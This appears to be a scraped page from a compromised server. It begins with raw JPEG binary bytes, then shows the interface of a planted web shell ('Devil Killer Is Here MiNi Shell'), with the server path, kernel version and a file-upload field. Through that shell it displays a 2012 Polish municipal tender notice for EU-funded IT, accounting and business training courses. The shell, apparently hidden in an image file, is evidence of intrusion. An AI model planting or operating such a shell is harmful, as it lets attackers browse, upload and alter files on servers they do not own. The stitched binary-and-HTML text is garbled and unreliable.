JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120222/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120222/42249-N-2012.html

<p class="kh_header"><b>Końskowola: Organizacja i przeprowadzenie szkoleń realizowanych w ramach projektu 
LUBKON - program zwiększania konkurencyjności 
przedsiębiorstw z województwa lubelskiego
 współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego z Programu Operacyjnego Kapitał Ludzki,
Poddziałanie 8.1.1. Wspieranie rozwoju kwalifikacji zawodowych 
i doradztwo dla przedsiębiorstw</b><br>
<b>Numer ogłoszenia: 42249 - 2012; data zamieszczenia: 22.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Końskowola , ul. Pożowska 3a, 24-130 Końskowola, tel. 081 8816201, faks 081 8816202.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.konskowola.info.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja i przeprowadzenie szkoleń realizowanych w ramach projektu 
LUBKON - program zwiększania konkurencyjności 
przedsiębiorstw z województwa lubelskiego
 współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego z Programu Operacyjnego Kapitał Ludzki,
Poddziałanie 8.1.1. Wspieranie rozwoju kwalifikacji zawodowych 
i doradztwo dla przedsiębiorstw.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest organizacja i przeprowadzenie szkoleń w ramach projektu 
LUBKON - program zwiększania konkurencyjności przedsiębiorstw z województwa lubelskiego (zwanego dalej projektem) realizowanego z Programu Operacyjnego Kapitał Ludzki, Priorytet VIII. Regionalne kadry gospodarki, Działanie 8.1 Rozwój pracowników i przedsiębiorstw w regionie, Poddziałanie 8.1.1. Wspieranie rozwoju kwalifikacji zawodowych i doradztwo dla przedsiębiorstw współfinansowanego ze środków Unii Europejskiej z Europejskiego Funduszu Społecznego oraz budżetu państwa dla 70 osób zatrudnionych na terenie woj. lubelskiego, zamieszkałych na terenie województwa lubelskiego. Szkolenia są prowadzone w formie kursów doskonalących, w zakresach tematycznych z których każdy stanowi odrębny moduł:

Moduł I.	Certyfikowany grafik wektorowy CAD;
Moduł II.	Certyfikowany projektant stron internetowych;
Moduł III. 	Certyfikowany administrator sieci Microsoft;
Moduł IV.	Certyfikowany administrator sieci Linux; 
Moduł V.	Certyfikowany księgowy;
Moduł VI.	Zarządzanie projektami w metodologii PRINCE2; 
Moduł VII.	Europejski certyfikat kompetencji biznesowych.

Zakres merytoryczny poszczególnych modułów określono w Załączniku nr 4 do SIWZ - Zakres merytoryczny szkoleń.

Liczbę uczestników i wymiar każdego z modułów wskazano w rozdziale III SIWZ - Założenia organizacyjne projektu.



Założenia organizacyjne projektu
	
Wykonawca zapewni na okres szkolenia bazę lokalową znajdującą się na terenie Gminy Końskowola.
W ramach każdego modułu Wykonawca przeszkoli uczestników w następujących grupach:
Moduł I. 	Certyfikowany grafik wektorowy CAD		- 1 grupa 10 osobowa;
Moduł II. 	Certyfikowany projektant stron internetowych	- 1 grupa 10 osobowa;
Moduł III. 	Certyfikowany administrator sieci Microsoft	- 1 grupa 10 osobowa;
Moduł IV. 	Certyfikowany administrator sieci Linux 		- 1 grupa 10 osobowa; 
Moduł V.	Certyfikowany księgowy				- 1 grupa 10 osobowa;
Moduł VI. 	Zarządzanie projektami w metodologii PRINCE2	- 1 grupa 10 osobowa;
Moduł VII. 	Europejski certyfikat kompetencji biznesowych 	- 1 grupa 10 osobowa.



Wymiar godzinowy i cykl poszczególnych modułów:

Moduł I. Certyfikowany grafik wektorowy CAD
Wymiar godzin na 1 grupę - 96 
Rodzaj certyfikatu - ECDL CAD, Instytucja certyfikująca PTI

Moduł II. Certyfikowany projektant stron internetowych
Wymiar godzin na 1 grupę - 48
Rodzaj certyfikatu - ECDL WebStarter, Instytucja certyfikująca PTI 


Moduł III. Certyfikowany administrator sieci Microsoft
Wymiar godzin na 1 grupę - 160
Rodzaj certyfikatu - Microsoft Certified IT Professional,  Instytucja certyfikująca Microsoft

Moduł IV. Certyfikowany administrator sieci Linux
Wymiar godzin na 1 grupę - 104
Rodzaj certyfikatu - Junior Level Linux Professional, Instytucja certyfikująca Linus Professional Institute

Moduł V. Certyfikowany księgowy
Wymiar godzin na 1 grupę - 120
Rodzaj certyfikatu - Stopień I - księgowy (kod zawodu: 331301), Stowarzyszenie Księgowych w Polsce; ECDL Start, Instytucja certyfikująca PTI

Moduł VI. Zarządzanie projektami w metodologii PRINCE2
Wymiar godzin na 1 grupę - 96
Rodzaj certyfikatu - Prince2 - Foundation, Instytucja certyfikująca APM Group,


Moduł VII. Europejski certyfikat kompetencji biznesowych
Wymiar godzin na 1 grupę - 120
Rodzaj certyfikatu - EBC*L - poziom A, TELC B1 English for Business oraz egzamin VCC na poziomie Select


Ogólne wymogi dotyczące realizacji szkoleń
1)	Poprzez godzinę szkoleniową Zamawiający rozumie godzinę lekcyjną, czyli 45 minut zegarowych zajęć.
2)	Szkolenia będą odbywać się w godzinach od 16.00 do 20.00 oraz w weekendy, jednak nie dłużej niż 8 godzin lekcyjnych dziennie.
3)	Rekrutację osób do projektu przeprowadzi Zamawiający.
4)	Szkolenia prowadzone będą zgodnie z dziennym harmonogramem projektu.
W ramach przedmiotu zamówienia Wykonawca zobowiązany jest także do:
a)	przedstawienia raportu, w którym będzie zawarta informacja o jakości szkoleń (ankiety oceniające prowadzone wśród uczestników zajęć),
b)	przeprowadzenia ankiet, oceniających efektywność i jakość szkoleń.
5)	Szkolenia prowadzone będą zgodnie ze szczegółowym zakresem merytorycznym projektu.
6)	Zastosowane metody nauczania muszą uwzględniać indywidualne podejście do każdego z uczestników.
7)	W ramach realizacji szkoleń Wykonawca zapewni:
a)	Kierownika kursu - 1 osoba ze średnim lub wyższym wykształceniem, posiadająca co najmniej 
3 letnie doświadczenie w organizacji i obsłudze szkoleń,
b)	sale komputerowe przystosowane do prowadzenia zajęć dydaktycznych wyposażone w niezbędne pomoce dydaktyczne, w co najmniej rzutnik multimedialny, projektor, ekran, tablice, plansze, sprzęt A   V, minimum 11 stanowisk komputerowych z siecią wewnętrzną i dostępem do Internetu,
c)	catering (uzupełniany w trakcie szkolenia) oraz dodatkowo obiad,
d)	warunki pracy osób szkolących się w trakcie trwania szkolenia zgodne przepisami bezpieczeństwa i higieny pracy,
e)	wystarczającą liczbę własnych licencji na oprogramowanie komputerowe wykorzystywane przy realizacji szkoleń,
f)	nieodpłatną dostawę  uczestnikom w trakcie szkolenia indywidualnych materiałów szkoleniowych odpowiadających zakresowi merytorycznemu poszczególnych modułów szkoleniowych w postaci skryptów, podręczników umożliwiających samodzielną naukę realizowanych treści programowych szkolenia oraz materiały piśmiennicze (długopis, ołówek, notatnik formatu A4), które po zakończeniu szkolenia przekazuje każdemu z kursantów na własność,
g)	nieodpłatną dostawę materiałów własnych i opracowań wykładowców obejmujących swoim zakresem tematykę szkolenia oraz jego cały cykl spięte w estetyczny sposób lub zbindowane, które zostaną wydane uczestnikom szkolenia w momencie rozpoczęcia szkolenia,
h)	odpowiednie działania informacyjne i promocyjne zgodne z Wytycznymi dotyczącymi realizacji projektów w ramach Unii Europejskiej, min.: oznaczenia sal szkoleniowych, materiałów szkoleniowych, dokumentów w związku z współfinansowaniem z Unii Europejskiej,
i)	ubezpieczenie osób uczestniczących w szkoleniu od następstw nieszczęśliwych wypadków,
j)	wydanie przeszkolonym uczestnikom zaświadczenia o ukończeniu szkolenia, zgodnie z warunkami określonymi przez Ministerstwo Edukacji Narodowej, 
k)	kwalifikacje i umiejętności wykładowców adekwatne do zakresu programowego prowadzonych przez nich szkoleń oraz wszelkie standardy prowadzenia szkoleń wynikające z innych umów bądź wymogów,
l)	szkolenia zostaną przeprowadzone w granicach administracyjnych gminy Końskowola.

Oferty równoważne

Wszędzie gdzie Zamawiający użył w SIWZ nazw własnych producentów lub znaków towarowych Wykonawca ma możliwość zaproponowania rozwiązań równoważnych do opisywanych. Wykonawca składając ofertę z innymi niż wskazane przez Zamawiającego w SIWZ autoryzacje i certyfikaty powinien dołączyć dokumenty potwierdzające równoważność proponowanych rozwiązań w oparciu o te same kryteria, które charakteryzują wskazane przez Zamawiającego autoryzacje i certyfikaty..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.31.00-0, 80.51.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.02.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający ustala wadium w wysokości: 
16 677 PLN (szesnaście tysięcy sześćset siedemdziesiąt siedem zł).

Każdy Wykonawca zobowiązany jest wnieść wadium, przed upływem terminu składania ofert na cały okres związania ofertą. 
Za termin wniesienia wadium w formie przelewu pieniężnego przyjmuje się termin uznania na rachunku Zamawiającego.

Uwaga: Wykonawca wnoszący wadium w pieniądzu zobowiązany jest do wniesienia wadium wyłącznie w walucie polskiej.

2. 	Wadium może być wnoszone w jednej lub kilku następujących formach:
a)	pieniądzu;
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c)	gwarancjach bankowych;
d)	gwarancjach ubezpieczeniowych;
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr 109, poz. 1158 ze zm.).

2.	Gwarancja bankowa, gwarancja ubezpieczeniowa, poręczenie bankowe oraz poręczenia innych instytucji winny zostać złożone w formie dokumentu oryginalnego. Dokument wadialny powinien być wystawiony na Zamawiającego, mieć formę oświadczenia bezwarunkowego, nieodwołalnego oraz winien zawierać stwierdzenie, że na pierwsze pisemne żądanie Zamawiającego wzywające do zapłaty wadium zgodnie z warunkami przetargu następuje jego bezwarunkowa wypłata bez jakichkolwiek zastrzeżeń.

4. 	Wadium w formie pieniężnej należy wnieść przelewem na rachunek bankowy Gminy Końskowola, na konto Zamawiającego 
	
	numer konta 06 8741 0004 0000 2206 2000 0010
	z podaniem tytułu: 

wadium w przetargu Szkolenia - LUBKON
 
5.	W przypadku wykonawców ubiegających się wspólnie o udzielenie zamówienia, wadium 
(w każdej z dopuszczalnych form) może być wnoszone przez jednego, kilku lub wszystkich Wykonawców, pod warunkiem, iż łączna wysokość wniesionego wadium odpowiadać będzie wymaganej kwocie wadium. W takim przypadku składając wadium należy wskazać w imieniu kogo i tytułem jakiego postępowania jest wnoszone wadium.
6.	Dowód wniesienia wadium: 
do oferty należy załączyć dokument potwierdzający wniesienie wadium przez Wykonawcę, tzn. 
a)	oryginał lub kopię przelewu potwierdzoną za zgodność z oryginałem przez osoby uprawnione do podpisywania oferty;
b)	oryginał dokumentu będący każdą inną formą wadium dopuszczoną przez Zamawiającego.

Pozostałe niepieniężne formy wadium dopuszczone przez Zamawiającego winny być dołączone do oferty lub złożone w oryginale w sekretariacie Gminy Końskowola (sekretariat) w terminie do dnia składania ofert do godz.12:00. 


7.	Zamawiający zwróci lub zatrzyma wadium zgodnie z przepisami art. 46 ustawy Pzp.
8.	Wprowadzenie w wadium jakichkolwiek ograniczeń czy też warunków w stosunku do treści art. 46 ust. 5 ustawy skutkuje nie wniesieniem wadium w wymaganej formie i w efekcie wykluczeniem Wykonawcy z udziału w postępowaniu.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający oceni czy Wykonawca spełnia warunek o którym mowa  na podstawie złożonego raz z ofertą oświadczenia o spełnieniu warunków udziału w postępowaniu, zgodnie z art. 44 ustawy Pzp - druk do ewentualnego wykorzystania (załącznik nr 3 do SIWZ).
	Ocena spełnienia przez Wykonawców warunków udziału w postępowaniu będzie dokonywana w oparciu o  kompletność i prawidłowość złożonych wszystkich oświadczeń i dokumentów żądanych przez Zamawiającego, zgodnie z art. 22 ust. 1, z zastrzeżeniem art. 26 ust. 3. Pzp.
Ocena spełnienia warunków odbywać się będzie na zasadzie spełnia  nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca zobowiązany jest przedłożyć wykaz wykonanych, a w przypadku świadczeń  okresowych lub ciągłych również wykonywanych, 3 usługi, których przedmiotem była organizacja i przeprowadzenie szkoleń zgodnych z przedmiotem zamówienia o wartości minimum 500 000 zł (pięćset tysięcy złotych) brutto każda, przy czym usługi te zostały zrealizowane w ramach projektu dofinansowanego ze środków Europejskiego Funduszu Społecznego i zostały zlecone wykonawcy przez beneficjenta projektu, w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia  w okresie ostatnich trzech lat przed  upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz z załączeniem dokumentu potwierdzającego (np. referencji, opinii), że usługi zostały wykonane lub są wykonywane należycie.   

Przez usługi szkoleniowe zgodne z przedmiotem zamówienia Zamawiający rozumie wykonanie usług, których przedmiotem była organizacja i przeprowadzenie szkoleń obejmujących w zakresie merytorycznym minimum 4 (cztery) obszary merytoryczne szkoleń z niżej wymienionych łącznie w każdej usłudze:

szkolenia z grafiki komputerowej;
szkolenia z zakresu projektowania stron internetowych;
szkolenia autoryzowane Microsoft;
szkolenia autoryzowane Linux;
szkolenia z zakresu księgowości;
szkolenia z zakresu zarządzania projektami;
szkolenia z zakresu kompetencji biznesowych.

Zamawiający oceni czy Wykonawca spełnia warunek o którym mowa na podstawie wykazu wykonanych usług, z wykorzystaniem wzoru (Załącznik Nr 5 do SIWZ) i dokumentów potwierdzających należyte wykonanie zamówienia (np. referencje, opinie).


Ocena spełnienia przez Wykonawców warunków udziału w postępowaniu będzie dokonywana w oparciu o  kompletność i prawidłowość złożonych wszystkich oświadczeń i dokumentów żądanych przez Zamawiającego, zgodnie z art. 22 ust. 1, z zastrzeżeniem art. 26 ust. 3. Pzp.
Ocena spełnienia warunków odbywać się będzie na zasadzie spełnia  nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający oceni czy Wykonawca spełnia warunek o którym mowa  na podstawie złożonego raz z ofertą oświadczenia o spełnieniu warunków udziału w postępowaniu, zgodnie z art. 44 ustawy Pzp - druk do ewentualnego wykorzystania (załącznik nr 3 do SIWZ).
	Ocena spełnienia przez Wykonawców warunków udziału w postępowaniu będzie dokonywana w oparciu o  kompletność i prawidłowość złożonych wszystkich oświadczeń i dokumentów żądanych przez Zamawiającego, zgodnie z art. 22 ust. 1, z zastrzeżeniem art. 26 ust. 3. Pzp.
Ocena spełnienia warunków odbywać się będzie na zasadzie spełnia  nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca zobowiązany jest dysponować niżej wymienionymi osobami w wykonaniu zamówienia:

1)	co najmniej pięcioma osobami na stanowisku prowadzącego szkolenia z zakresu szkoleń komputerowych ECDL w poszczególnych modułach posiadającymi certyfikat ECDL Advanced,
2)	co najmniej jedną osobą na stanowisku prowadzącego szkolenia z zakresu grafiki komputerowej posiadającą certyfikat Adobe Certified Instructor,
3)	co najmniej jedną osobą na stanowisku prowadzącego szkolenia z zakresu grafiki komputerowej posiadającą certyfikat Corel Certified Instructor,
4)	co najmniej dwiema osobami na stanowisku prowadzącego szkolenia z zakresu projektowania serwisów internetowych,
5)	co najmniej trzema osobami na stanowisku prowadzącego szkolenia autoryzowane Microsoft posiadającymi certyfikat Microsoft Certified Trainer,
6)	co najmniej dwiema osobami na stanowisku prowadzącego szkolenia autoryzowane Linux posiadającymi certyfikat Certified Novell Instructor;
7)	co najmniej dwiema osobami na stanowisku prowadzącego szkolenia z zakresu księgowości,
8)	co najmniej dwiema osobami na stanowisku prowadzącego szkolenia z zakresu zarządzania projektami PRINCE2,
9)	co najmniej dwiema osobami na stanowisku prowadzącego szkolenia z zakresu języka angielskiego na poziomie średniozaawansowanym;
10)	co najmniej dwiema osobami na stanowisku prowadzącego szkolenia w zakresie kompetencji biznesowych;
11)	co najmniej dwiema osobami na stanowisku egzaminatora posiadającymi uprawnienia egzaminatora VCC (Vocational Competence Certificate) na poziomie Select dla kompetencji negocjacje z elementami NLP realizowanego w ramach modułu Europejski Certyfikat Kompetencji Biznesowych;
12)	co najmniej dwiema osobami posiadającymi doświadczenie i wiedzę w zakresie organizacji szkoleń oraz funduszy europejskich na stanowisku kierownika projektu i specjalisty ds. organizacji szkoleń, których kompetencje w zakresie problematyki funduszy europejskich zostały zweryfikowane przez zewnętrzną jednostkę certyfikującą.



Wyżej wymienione osoby:
 
1)	posiadają uprawnienia, kwalifikacje oraz możliwość prowadzenia szkoleń autoryzowanych wymaganych w przedmiocie zamówienia (zamawiający poprzez możliwość i uprawnienia prowadzenia szkoleń autoryzowanych przez wykonawcę rozumie posiadanie autoryzacji i certyfikatów przez wykonawcę nadawanych przez producentów oprogramowania wykorzystywanego na szkoleniach informatycznych w zakresie edukacji, tj. Microsoft Certified Partner Learning Solutions, Corel Training Partner, Adobe Authorised Training Partner, Novell Training Partner);
2)	posiadają zaświadczenie podmiotu udzielającego certyfikacji programów szkoleń pod kątem zgodności ich zakresu z wymaganiami międzynarodowego Europejskiego Certyfikatu Umiejętności Komputerowych (ECDL) potwierdzające, iż wykonawca spełnia określone wymogi merytoryczne proponowanych programów szkoleń zgodnie z certyfikacją ECDL oraz posiada status Centrum Egzaminacyjnego ECDL i Laboratorium ECDL;
3)	posiadają zaświadczenie podmiotu udzielającego akredytacji w zakresie certyfikacji Vocational Competence Certificate dotyczące posiadania statusu Akademii Edukacyjnej VCC;
4)	posiadają zaświadczenie podmiotu udzielającego akredytacji w zakresie certyfikacji Vocational Competence Certificate dotyczące posiadania statusu Partnera Egzaminacyjnego VCC;
5)	posiadają zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzającego, iż wykonawca spełnia określone wymogi jakościowe zgodnie z normą ISO 9001:2000 w zakresie szkoleń lub równoważny dokument potwierdzający jakość świadczonych usług.

W tym celu złoży wraz z ofertą wykaz osób uczestniczących w wykonaniu zamówienia, z wykorzystaniem wzoru załącznik nr 8 do SIWZ.
Zamawiający oceni czy Wykonawca spełnia warunek o którym mowa na podstawie wykazu osób uczestniczących w wykonaniu zamówienia - z wykorzystaniem wzoru (Załącznik nr 8 do SIWZ).
Ocena spełnienia przez Wykonawców warunków udziału w postępowaniu będzie dokonywana w oparciu o  kompletność i prawidłowość złożonych wszystkich oświadczeń i dokumentów żądanych przez Zamawiającego, zgodnie z art. 22 ust. 1, z zastrzeżeniem art. 26 ust. 3. Pzp.
Ocena spełnienia warunków odbywać się będzie na zasadzie spełnia  nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca złoży wraz z ofertą informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których Wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy wysokości co najmniej 500 000 zł, wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania ofert oraz, że jest  ubezpieczony od odpowiedzialności cywilnej od prowadzonej działalności na kwotę nie mniejszą niż 500 000 zł (przez okres wykonania zamówienia).

Zamawiający oceni czy Wykonawca spełnia warunek o którym mowa na 
podstawie informacji z banku lub kasy oszczędnościowo-kredytowej, potwierdzających że posiada dostęp do środków finansowych lub ma zdolność kredytową w wysokości co najmniej 500 000 zł i jest  ubezpieczony od odpowiedzialności cywilnej od prowadzonej działalności na kwotę nie mniejszą niż 500 000 zł (przez okres wykonania zamówienia).
Zamawiający oceni czy Wykonawca spełnia warunek o którym mowa na podstawie wykazu osób uczestniczących w wykonaniu zamówienia - z wykorzystaniem wzoru (Załącznik nr 8 do SIWZ).
Ocena spełnienia przez Wykonawców warunków udziału w postępowaniu będzie dokonywana w oparciu o  kompletność i prawidłowość złożonych wszystkich oświadczeń i dokumentów żądanych przez Zamawiającego, zgodnie z art. 22 ust. 1, z zastrzeżeniem art. 26 ust. 3. Pzp.
Ocena spełnienia warunków odbywać się będzie na zasadzie spełnia  nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

